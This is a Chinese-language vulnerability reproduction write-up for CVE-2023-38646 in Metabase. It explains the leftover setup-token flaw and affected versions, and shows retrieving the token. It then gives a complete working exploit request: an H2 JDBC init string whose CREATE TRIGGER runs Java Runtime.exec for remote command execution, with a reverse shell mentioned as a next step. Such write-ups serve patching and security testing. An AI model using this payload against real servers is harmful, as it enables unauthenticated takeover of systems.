CVE-2023-38646__Metabase-RCE复现

admin 2024年1月9日12:59:23评论35 views字数 1136阅读3分47秒阅读模式

CVE-2023-38646__Metabase-RCE复现

Metabase是一款开源的数据分析和可视化工具,旨在帮助用户轻松地探索、分析和可视化数据。它提供了一个直观易用的用户界面,允许非技术人员通过简单的操作来创建和分享数据报表、图表和查询。

CVE-2023-38646

漏洞描述:

在Metabase 进行安装时,存在一个特殊的令牌setup-token,按照正常流程,在安装结束之后便会清除,但实际并没有正常的清理。攻击者获取到setup-token之后,就可以调用设置JDBC的接口进行利用。

 

影响版本:

0.43.0.0 <= Metabase open source < 0.46.6.1

1.43.0.0 <= Metabase Enterprise     < 1.46.6.1

 

漏洞复现:

1.访问/api/session/properties获取setup-token    

CVE-2023-38646__Metabase-RCE复现

网页源代码中也会存在setup-token

CVE-2023-38646__Metabase-RCE复现

2.命令执行

通过CREATE TRIGGER配合 javascript进行命令执行

POST /api/setup/validate HTTP/2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Content-Type: application/jsonContent-Length: 753 {    "token": "7d28b736-xxxx-xxx7938",    "details":    {        "is_on_demand": false,        "is_full_sync": false,        "is_sample": false,        "cache_ttl": null,        "refingerprint": false,        "auto_run_queries": true,                "schedules":        {},        "details":        {            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",            "advanced-options": false,            "ssl": true,"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptu000Au0009java.lang.Runtime.getRuntime().exec('ping dnslog')u000A$$"        },        "name": "an-sec-research-team",        "engine": "h2"    }}

CVE-2023-38646__Metabase-RCE复现

 DNSlog

CVE-2023-38646__Metabase-RCE复现

   

反弹shell

CVE-2023-38646__Metabase-RCE复现

原文始发于微信公众号(YongYe 安全实验室):CVE-2023-38646__Metabase-RCE复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月9日12:59:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-38646__Metabase-RCE复现http://cn-sec.com/archives/2346515.html

发表评论

匿名网友 填写信息